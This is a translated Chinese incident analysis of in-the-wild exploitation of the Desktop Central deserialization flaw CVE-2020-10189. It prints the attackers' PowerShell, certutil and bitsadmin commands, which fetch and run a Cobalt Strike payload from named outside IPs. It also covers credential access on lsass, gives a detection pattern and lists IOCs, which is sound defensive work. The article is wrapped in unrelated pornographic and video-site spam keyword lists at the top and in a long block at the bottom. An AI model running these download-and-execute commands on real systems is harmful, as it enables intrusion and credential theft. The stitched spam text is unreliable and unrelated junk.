精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Desktop Central服務(wù)器RCE漏洞在野攻擊分析

安全 漏洞
Zoho ManageEngine Desktop Central 10允許遠(yuǎn)程執(zhí)行代碼,漏洞成因是FileStorage類的getChartImage中的不可信數(shù)據(jù)反序列化,此漏洞和CewolfServlet,MDMLogUploaderServlet Servlet有關(guān)。

0x01 漏洞披露

在研究Desktop Central漏洞的過程中,我們在推特上找到了一位研究人員的帖子,該研究人員于2020年3月5日披露了Desktop Central的RCE漏洞。

Zoho ManageEngine Desktop Central 10允許遠(yuǎn)程執(zhí)行代碼,漏洞成因是FileStorage類的getChartImage中的不可信數(shù)據(jù)反序列化,此漏洞和CewolfServlet,MDMLogUploaderServlet Servlet有關(guān)。

對CVE-2020-10189的研究還顯示,可以在??Shodan??上搜索易受攻擊的Desktop Central服務(wù)器。

在公網(wǎng)發(fā)現(xiàn)的威脅是有可疑的PowerShell下載通訊錄,該通訊錄包含下載文件的說明。

最早威脅活動之一是一些可疑的PowerShell下載命令。該命令包含指令,以下載install.bat并storesyncsvc.dll到C:\Windows\Temp,然后立即執(zhí)行install.bat(圖3)。

cmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/install.bat','C:\Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/storesyncsvc.dll','C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat
esktop Central服務(wù)器RCE漏洞在野攻擊分析

圖3-可疑的PowerShell下載命令

該install.bat腳本包含storesyncsvc.dll作為服務(wù)安裝在系統(tǒng)上的說明。(圖4)。

??

圖4-Install.bat的內(nèi)容

在運行PowerShell命令后,我們觀察到安裝了服務(wù)名稱StorSyncSvc和顯示名稱為Storage Sync Service(圖5)的新服務(wù)。

??


圖5-安裝Storage Sync Service

VirusTotal上的查詢結(jié)果表明,一些檢測引擎已經(jīng)歸類storesyncsvc.dll為惡意軟件。

??https://www.virustotal.com/gui/file/f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c/details??

0x02 利用過程跟蹤識別漏洞利用

此RCE漏洞已于2020年3月5日通過Twitter公開。

回顧Sysmon流程創(chuàng)建事件,表明C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe流程是負(fù)責(zé)執(zhí)行PowerShell Download命令的流程(圖6)。

??

圖6-ParentImage負(fù)責(zé)PowerShell的下載

查看內(nèi)存中的進程,我們還觀察到Desktop Central java.exe應(yīng)用程序cmd.exe和2.exe之間的父/子進程關(guān)系(圖7)。

??

圖7- java.exe父/子進程關(guān)系

0x03 利用文件系統(tǒng)識別漏洞利用

為了進一步驗證我們的理論,我們將從受影響的Desktop Central服務(wù)器收集的信息與已發(fā)布的POC進行了比較,確定攻擊者可能利用了CVE-2020-10189漏洞在此易受攻擊的系統(tǒng)上運行代碼。

通過文件系統(tǒng)時間軸分析,我們確定遍歷文件寫可能已在具有文件名_chart(圖8)和logger.zip(圖9)的系統(tǒng)上發(fā)生   。

??

 圖8- _chart文件系統(tǒng)分析

??

圖9- logger.zip文件系統(tǒng)分析

這些文件名也在??@Steventseeley???發(fā)布的POC中進行了??引用??(圖10)。

??

圖10-POC中對_chart和logger.zip的引用,參考:??https??? : ??//srcincite.io/pocs/src-2020-0011.py.txt??

0x04 引入系統(tǒng)命令

在隨后的流程創(chuàng)建日志中,cmd.exe使用certutil.exe命令來下載和執(zhí)行2.exe(圖11),進一步的分析表明,很有可能   2.exe可能是C2工具Cobalt Strike的一部分。

cmd /c certutil -urlcache -split -f http://91.208.184.78/2.exe && 2.exe

??

圖11-Certutil命令

OSINT透露2.exe已被VirusTotal上的多個檢測引擎識別為惡意軟件:??https???:??//www.virustotal.com/gui/file/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/details??

利用app.any.run沙箱(圖12)和對惡意軟件的內(nèi)存分析,進一步證實2.exe托管Cobalt Strike Beacon payload的可能性。

??

圖12- 2.exe被判定為惡意軟件

??https://any.run/report/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/e65dd4ff-60c6-49a4-8e6d-94c6c80a74b6??

我們對已知惡意軟件2.exe所使用的所有內(nèi)存段進行了yara掃描,yara掃描結(jié)果進一步支持了2.exe在其他幾種可能的惡意軟件簽名的理論(圖13)。

??

圖13-Yarascan掃描結(jié)果

利用Volatility的惡意插件,我們確定了幾個可能存在代碼注入跡象的內(nèi)存部分,我們對另一個由malfind轉(zhuǎn)儲的內(nèi)存段進行了yara掃描,進一步證實了我們的猜想。

在下面的記錄中可以看到整個過程(圖14)。

(原文中查看完整過程

圖14-Yarascan驗證結(jié)果

然后,我們檢查了malfind的輸出以獲得代碼注入的證據(jù),并確定了其中的可疑內(nèi)存部分svchost.exe(圖15)。OSINT的研究使我們找到了一位研究人員,該研究人員對惡意軟件進行了逆向,并找到了負(fù)責(zé)向其中注入代碼的部分svchost.exe(圖16)。

??

 圖15-對包含注入代碼的svchost的分析

??

圖16-@VK_Intel的分析顯示了可能的注入功能

參考:

Desktop Central服務(wù)器RCE漏洞在野攻擊分析

在攻擊結(jié)束后,我們觀察到了惡意的Bitsadmin命令,其中包含install.bat從66.42.96.220可疑端口12345進行轉(zhuǎn)移的指令。

我們的分析師觀察到,bitsadmin命令正在Desktop Central服務(wù)器上運行,該命令包含在PowerShell下載命令中調(diào)用的相同IP地址,端口和相同的install.bat文件(圖17)。

cmd /c bitsadmin /transfer bbbb http://66.42.98.220:12345/test/install.bat C:\Users\Public\install.bat

??

圖17-Bitsadmin命令

0x05 訪問憑證

我們還觀察到了潛在的憑證訪問活動。攻擊者執(zhí)行憑據(jù)轉(zhuǎn)儲的常用技術(shù)是使用惡意進程(SourceImage)訪問另一個進程(TargetImage),最常見的是將lsass.exe作為目標(biāo),因為它通常包含敏感信息,例如帳戶憑據(jù)。

在這里,我們觀察到SourceImage 2.exe訪問TargetImage lsass.exe(圖18)。Cobalt Strike Beacon包含類似于??Mimikatz的??本機憑證轉(zhuǎn)儲功能,使用此功能的唯一必要條件是攻擊者具有的SYSTEM特權(quán),以下事件提供了充分的證據(jù)證明憑證訪問的風(fēng)險很高。

??

圖18- 2.exe訪問lsass.exe

在對這種入侵進行分析的過程中,我們向Eric Zimmerman的??KAPE???工具添加了一些收集目標(biāo)功能,以將??相關(guān)日志??添加到分類工作中。

工具地址:??https://binaryforay.blogspot.com/2019/02/introducing-kape.html??

針對相關(guān)日志的用法示例:

kape.exe --tsource C: --tdest c:\temp\tout --tflush --target ManageEngineLogs

Sigma項目的Florian Roth創(chuàng)建了一個簽名來檢測攻擊者利用的某些技術(shù):

??https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_exploit_cve_2020_10189.yml??

我們對該攻擊的分析還發(fā)現(xiàn),在進程創(chuàng)建日志中基于命令行活動進行檢測將很有價值:

ParentImage | endswith: 
'DesktopCentral_Server\jre\bin\java.exe'
CommandLine | contains:
'*powershell*'
'*certutil*'
'*bitsadmin*'

0x06 IOCs

·Storesyncsvc.dll

· MD5: 5909983db4d9023e4098e56361c96a6f

· SHA256: f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c

·Install.bat

· MD5: 7966c2c546b71e800397a67f942858d0

· SHA256: de9ef08a148305963accb8a64eb22117916aa42ab0eddf60ccb8850468a194fc

·2.exe

· MD5: 3e856162c36b532925c8226b4ed3481c

· SHA256: d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309

· 66[.]42[.]98[.]220

· 91[.]208[.]184[.]78

· 74[.]82[.]201[.]8

本文翻譯自:https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/ https://nvd.nist.gov/vuln/detail/CVE-2020-10189#vulnCurrentDescriptionTitle如若轉(zhuǎn)載,請注明原文地址


責(zé)任編輯:姜華 來源: 嘶吼網(wǎng)
相關(guān)推薦

2025-03-05 15:10:13

2024-01-08 19:18:17

2021-03-16 09:45:25

漏洞攻擊RCE

2009-08-05 22:19:15

2021-09-08 18:23:34

漏洞攻擊Confluence

2014-10-31 09:12:41

2009-05-22 10:06:25

2009-10-10 17:40:34

2021-02-09 10:31:04

漏洞webWordPress F

2022-07-18 14:10:55

漏洞網(wǎng)絡(luò)攻擊

2012-02-17 09:47:50

2015-04-16 13:19:52

2015-09-01 10:33:53

2018-03-15 08:25:53

2021-04-16 11:01:28

ExchangeNSA漏洞

2023-02-20 14:46:55

2020-02-17 09:53:57

漏洞DDoS攻擊

2020-09-28 10:20:30

漏洞

2022-02-25 16:07:04

漏洞PHPWordPress
點贊
收藏

51CTO技術(shù)棧公眾號

在线观看国产免费视频| 精品欧美国产| 亚洲AV成人无码网站天堂久久| 日韩高清中文字幕一区二区| 成年人国产精品| 性欧美在线看片a免费观看 | 成人精品小蝌蚪| 国产91ⅴ在线精品免费观看| 亚洲v国产v欧美v久久久久久| 国内欧美日韩| 亚洲国产cao| 日本精品一区| 成人免费观看在线视频| 久久国产成人| 久久国产精品偷| av网站免费在线播放| 亚洲色图综合| 婷婷综合五月天| 亚洲精品国产精品国自产| 亚洲va欧美va| 日韩—二三区免费观看av| 九九九久久国产免费| 欧美国产视频在线观看| 日本免费一区二区三区| 国产精品xxxxxx| 国产精品黄色| 在线视频精品一| 娇妻高潮浓精白浆xxⅹ| 欧美男男gaygay1069| 午夜视频一区二区| 青青在线免费视频| jyzzz在线观看视频| 成人免费看视频| 国产一区视频在线播放| 国产剧情在线视频| 亚洲成色精品| 美女av一区二区| 人妻av无码一区二区三区| ccyy激情综合| 欧美精品成人一区二区三区四区| 看av免费毛片手机播放 | 一区二区三区久久精品| 99久久久无码国产精品性波多 | 成人免费观看毛片| 青草青在线视频| 国产精品不卡一区| 欧洲在线视频一区| 深夜福利免费在线观看| 高清shemale亚洲人妖| 成人网欧美在线视频| 黄色污污视频软件| 久久亚洲欧洲| 欧美亚洲另类制服自拍| 69精品久久久| 亚洲黑丝一区二区| 久久久久久久999精品视频| 精品国产精品国产精品| 欧美国产小视频| 亚洲天天在线日亚洲洲精| 亚洲黄色在线观看| 欧美三级理论片| 六月婷婷综合| 色噜噜狠狠色综合中国| 免费午夜视频在线观看| 久久毛片亚洲| 欧美在线一区二区| 中文字幕国产传媒| ww久久综合久中文字幕| 欧洲精品在线观看| 亚洲黄色av网址| 成人国产精品入口免费视频| 色婷婷久久久综合中文字幕| 免费午夜视频在线观看| 欧亚一区二区| 欧美在线观看你懂的| www黄色在线| 日韩精品第一| 538在线一区二区精品国产| 91大神免费观看| 91精品短视频| 亚洲激情在线观看视频免费| 成年人的黄色片| 欧美人与牛zoz0性行为| 一区二区亚洲欧洲国产日韩| 人妻无码一区二区三区免费| 无遮挡的视频在线观看| 国产一区二区三区91| 国产一区二区三区在线播放免费观看| 少妇太紧太爽又黄又硬又爽小说| 久久亚洲影视| 欧美猛交免费看| 在线观看国产亚洲| 免费观看在线综合色| 国产三级精品网站| 超碰在线观看99| 91在线视频观看| 午夜午夜精品一区二区三区文| 日本在线视频观看| 亚洲午夜视频在线| 日本激情视频在线| 蜜桃在线一区| 日韩激情视频在线播放| 天美传媒免费在线观看| 激情五月***国产精品| 奇门遁甲1982国语版免费观看高清| av首页在线观看| 成人精品小蝌蚪| 亚洲精品一区二| wwwww亚洲| 欧美日韩免费视频| 黑森林av导航| 日韩精品一卡| 7777免费精品视频| 国产一区二区三区三州| 91在线免费播放| 日本女人高潮视频| 中文在线а√在线8| 日韩欧美视频在线| 久久久免费看片| 亚洲综合国产| 99久久精品无码一区二区毛片| 水蜜桃在线免费观看| 天堂成人在线视频| 亚洲乱码国产乱码精品精的特点 | 少妇熟女视频一区二区三区 | 国产精品99久久久久久有的能看| 日本一区二区在线| 成年人国产在线观看| 欧美日韩精品欧美日韩精品| 亚洲精品理论片| 精品动漫3d一区二区三区免费版| 成人xxxx视频| 国产日本在线| 色婷婷一区二区三区四区| 伊人久久一区二区三区| 亚洲女同中文字幕| 国产日韩精品一区二区| 玖玖综合伊人| 狠狠躁夜夜躁久久躁别揉| 69久久精品无码一区二区| 欧美成人直播| 国产精品久久久久久久久久尿 | 二吊插入一穴一区二区| 精品国产一二三| www青青草原| 精品一区二区久久久| 日韩中文字幕一区| 欧美momandson| 国产视频亚洲视频| 欧美不卡视频在线观看| 国产成+人+日韩+欧美+亚洲| 亚洲区成人777777精品| 在线不卡一区| www.亚洲免费视频| 日本午夜精品一区二区三区| www.97超碰| 亚洲视频免费在线| 无套内谢丰满少妇中文字幕 | ww久久综合久中文字幕| 亚洲性av在线| 日本熟妇一区二区三区| 久久综合久久鬼色中文字| 精品人妻一区二区三区四区在线| 人人网欧美视频| 97超碰国产精品女人人人爽| 无码国产精品高潮久久99| 欧美日韩国产综合视频在线观看中文 | av香蕉成人| 日韩亚洲欧美中文三级| 青娱乐国产盛宴| 懂色中文一区二区在线播放| a级黄色小视频| 天天操综合520| 国产成人在线一区二区| 丁香在线视频| 欧美视频一二三区| www欧美com| 高清久久久久久| 日韩av资源在线| 日韩免费av| 亚洲最大福利视频| 国产v日韩v欧美v| 一本一本久久a久久精品牛牛影视 一本色道久久综合亚洲精品小说 一本色道久久综合狠狠躁篇怎么玩 | 天天操天天色综合| 无码少妇精品一区二区免费动态| 毛片一区二区三区| 国产xxxx振车| 国产精品探花在线观看| 国产综合福利在线| 黄色美女视频在线观看| 亚洲人成亚洲人成在线观看| 成人免费视频网址| aaa大片在线观看| 亚洲电影第1页| 欧美性猛交xxxx乱大交hd| 亚洲欧洲综合另类| 亚洲成人av免费在线观看| 免费观看一级特黄欧美大片| 丰满人妻一区二区三区53号| 香蕉久久夜色精品国产更新时间| 国产精品视频久久| 不卡av免费观看| 国产一区二区三区在线| 亚洲黄色a级片| 欧美性大战久久| 久久久久成人片免费观看蜜芽| 久久综合一区二区| 亚欧美一区二区三区| 久久精品123| 日本久久久网站| 日韩欧美国产精品综合嫩v| 精品国产一区二区三区日日嗨| 美女视频一区| 欧美在线精品免播放器视频| 国产高清一区二区三区视频| 亚洲精品网站在线播放gif| va视频在线观看| 日本电影亚洲天堂一区| 国产精品成人av久久| 综合欧美一区二区三区| 亚洲第一页av| 成人黄色在线视频| caoporm在线视频| 日韩精品一二三区| 日本欧美黄色片| 你懂的国产精品| 亚洲一区3d动漫同人无遮挡| 亚洲男人都懂第一日本| 国产精品久久一区二区三区| 欧美黄色网络| 国产精品视频在线播放| 天堂资源在线| 国产精品色哟哟| 日韩中文字幕一区二区| 香蕉视频一区| 国产一区精品视频| 亚洲精品黑牛一区二区三区| 91精品久久久久久久久久久久久| 高清不卡av| 欧美专区国产专区| av日韩中文| 欧美极品少妇xxxxx| 99久久精品免费观看国产| 精品国偷自产在线视频99| 日本不卡视频| 综合国产在线视频| 91看片在线观看| 中文字幕亚洲专区| 69av在线| 色哟哟网站入口亚洲精品| 美女毛片在线看| 国产一区二区欧美日韩| 国产一区电影| 伊人成人开心激情综合网| 国产在线观看黄| 在线丨暗呦小u女国产精品| 国产系列电影在线播放网址| 亚洲视频第一页| 国产美女视频一区二区三区 | 婷婷国产在线综合| 欧美不卡视频在线观看| 欧美日韩精品在线观看| 久久久久久91亚洲精品中文字幕| 精品久久香蕉国产线看观看亚洲| 亚州国产精品视频| 欧美日韩免费看| 激情网站在线观看| 欧美色图在线观看| 国产精品一区二区三区毛片淫片| 美女国产在线| 色中色综合影院手机版在线观看| 日日夜夜天天综合入口| 91国语精品自产拍在线观看性色 | 妖精一区二区三区精品视频| 欧美日韩日本网| 波多野结衣在线播放一区| 在线观看一区二区三区三州 | 久久五月情影视| 黄色大片在线| 26uuu日韩精品一区二区| 日韩av超清在线观看| 91精品中国老女人| 激情视频极品美女日韩| 日本不卡高清视频一区| 91久久国产| 国产96在线 | 亚洲| 日韩有码一区二区三区| 在线观看视频你懂得| 99re免费视频精品全部| 国产午夜精品久久久久久久久| 欧美国产一区二区在线观看| 欧美人妻精品一区二区免费看| 精品国产福利视频| 少妇又紧又色又爽又刺激视频| 91精品国产综合久久香蕉麻豆| 黑人精品一区二区| 亚洲欧美在线看| 福利视频在线| 欧美一区二区三区…… | 91精品黄色| 美女少妇全过程你懂的久久| 在线看无码的免费网站| 日韩伦理在线观看| 一区二区三区视频在线观看| 污污免费在线观看| 国产女主播在线直播| 日韩免费看片| 在线观看日产精品| 亚洲在线免费看| 国产呦小j女精品视频| 麻豆影视国产在线观看| 亚洲成人国产| 在线观看欧美日本| 久久婷婷人人澡人人喊人人爽| 国产午夜精品理论片在线| av亚洲一区二区三区| 成人一道本在线| 日韩经典第一页| 国产伦精品一区二区三区在线| 午夜黄色福利视频| f2c人成在线观看免费视频| 亚洲高清毛片| 红桃视频成人在线观看| 亚洲最大成人在线| 大吊一区二区三区| 亚洲va欧美va人人爽成人影院| 色综合久久久久综合| 日韩三级在线播放| 免费黄色小视频在线观看| 动漫视频在线一区| 最新国产の精品合集bt伙计| 国产成人精品视频在线观看| 日韩av无码一区二区三区不卡 | 日韩中文娱乐网| 国产不卡av在线免费观看| 亚洲二区av| 日本高清视频一区二区三区| 一本久久综合| 日本一卡二卡在线| 亚洲一二三四区| 精品人妻少妇嫩草av无码专区| 精品国产欧美一区二区五十路| 国产精品扒开腿做爽爽爽视频软件| 精品欧美一区二区精品久久| 狠狠爱综合网| 韩国三级在线看| 一区二区免费在线播放| 国产日韩一级片| 欧美另类精品xxxx孕妇| 国产高清亚洲| 7777在线视频| 国产乱人伦偷精品视频不卡| 欧美特级一级片| 欧美一区二区福利在线| 4438x成人网全国最大| 97超碰资源| 在线观看亚洲| 强迫凌虐淫辱の牝奴在线观看| 亚洲va在线va天堂| 天天射天天操天天干| 91高清视频在线免费观看| 一本色道久久综合亚洲精品酒店 | 岛国在线视频免费看| 国产精品精品视频| 国产精品国产一区| xxxx国产视频| 精品久久久久久中文字幕大豆网| 亚洲欧美日韩免费| 国产精品69av| 国产精品99久久| 中文字幕一区二区三区人妻在线视频| 亚洲午夜精品17c| 日本啊v在线| 国产精品久久久久久久久免费看| 国产韩国精品一区二区三区| 中文字幕avav| 午夜久久久影院| 成人资源www网在线最新版| 国产精品美乳在线观看| 天天影视综合| 中国xxxx性xxxx产国| 色婷婷久久综合| 久草中文在线| 国产一区二区三区高清| 玖玖在线精品| 成人在线观看小视频| 亚洲国产成人av在线| 日韩电影av| 黄色网zhan| 国产亚洲污的网站| 国产高清免费在线观看| 日本久久亚洲电影| 亚洲国产一成人久久精品| 国产又黄又粗又猛又爽的视频| 欧美伊人久久久久久午夜久久久久| 黄色免费网站在线观看| 在线不卡的av| 五月天婷婷激情| 久久精品影视伊人网| 久久香蕉精品香蕉|